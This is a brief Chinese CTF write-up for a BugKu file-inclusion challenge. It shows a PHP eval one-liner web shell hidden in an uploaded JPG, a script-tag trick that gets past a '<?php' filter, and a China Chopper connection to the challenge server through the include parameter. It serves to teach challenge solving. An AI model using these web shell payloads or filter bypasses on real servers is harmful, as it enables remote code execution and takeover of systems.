1.此题不是简单的文件包含读取,本来想着是直接读取文件,但是失败了。
2.我们试试上传一句话图片木马,新建一个jpg文件里面写入一句话木马<?php @eval($_POST['shell']); ?>
然后上传之后访问发现存在过滤,将<?php替换成_。
3.但是我们可以利用script标签绕过,写入<script language=php> @eval($_POST['shell']); </script>
,上传之后没有错误显示。
4.我们这时候就可以直接用菜刀了,直接连接:http://123.206.31.85:49166/index.php?file=upload/201810300315094833.jpg
密码:shell就可以访问目录了。
文件包含2-BugKu(方法二):https://www.writeup.top/449.html